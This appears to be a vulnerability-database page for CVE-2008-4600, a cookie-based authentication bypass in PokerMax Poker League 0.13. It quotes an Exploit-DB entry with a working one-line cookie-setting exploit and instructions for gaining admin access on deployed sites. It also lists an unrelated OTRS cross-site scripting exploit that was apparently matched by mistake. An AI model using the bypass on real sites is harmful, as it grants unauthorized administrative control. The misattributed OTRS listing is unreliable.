CVE-2008-4600
published 2008-10-18CVE-2008-4600: configure.php in PokerMax Poker League Tournament Script 0.13 allows remote attackers to bypass authentication and gain administrative access by setting the…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.65%
83.7th percentile
configure.php in PokerMax Poker League Tournament Script 0.13 allows remote attackers to bypass authentication and gain administrative access by setting the ValidUserAdmin cookie.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| steve_dawson | pokermax_poker_league_tournament_script | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting
exploitdb·2012-08-31
CVE-2012-4751 OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting
OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting
---
#!/usr/bin/python
'''
Author: Mike Eduard - Znuny - Enterprise Services for OTRS
Product: OTRS Open Technology Real Services
Version: 3.1.8 and 3.1.9
Vendor Homepage: http://otrs.org
CVE: 2012-4600
Timeline:
22 Aug 2012: Vulnerability reported to vendor and CERT
23 Aug 2012: Response received from CERT and vendor
28 Aug 2012: Update from vendor to have it fixed and released on 30 Aug 2012
30 Aug 2012: Update: vulnerability patched
http://www.kb.cert.org/vuls/id/511404
http://znuny.com/#!/advisory/ZSA-2012-02
http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-02/
31 Aug 2012: Public Disclosure
Installed On: Windows Server 2008 R2 & Open SUSE 12.1
Client Test OS: Window 7
Exploit-DB
PokerMax Poker League 0.13 - Insecure Cookie Handling
exploitdb·2008-10-16
CVE-2008-4600 PokerMax Poker League 0.13 - Insecure Cookie Handling
PokerMax Poker League 0.13 - Insecure Cookie Handling
---
Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul
Script :
PokerMax Poker League Insecure Cookie Handling Vulnerability
Download:
http://www.stevedawson.com/downloads/pokerleague.zip
Exploit :
javascript:document.cookie = "ValidUserAdmin=admin";
**here "admin" refers to username of administrator on site
default username is "admin" given after installation of site
but if it is changed u can easily find out username of admin and then
substitute it in place of "admin"
Instructions :
Find the site running on this script .
Go to http://site.com/pokerleague/pokeradmin/configure.php
It will ask for login. Now in url tab run the exploit command
Then return back to http://site.com/pokerleague/pokeradmin/configure.php
No writeups or analysis indexed.
http://secunia.com/advisories/32312http://securityreason.com/securityalert/4431http://www.securityfocus.com/bid/31784https://exchange.xforce.ibmcloud.com/vulnerabilities/45931https://www.exploit-db.com/exploits/6766http://secunia.com/advisories/32312http://securityreason.com/securityalert/4431http://www.securityfocus.com/bid/31784https://exchange.xforce.ibmcloud.com/vulnerabilities/45931https://www.exploit-db.com/exploits/6766
2008-10-18
Published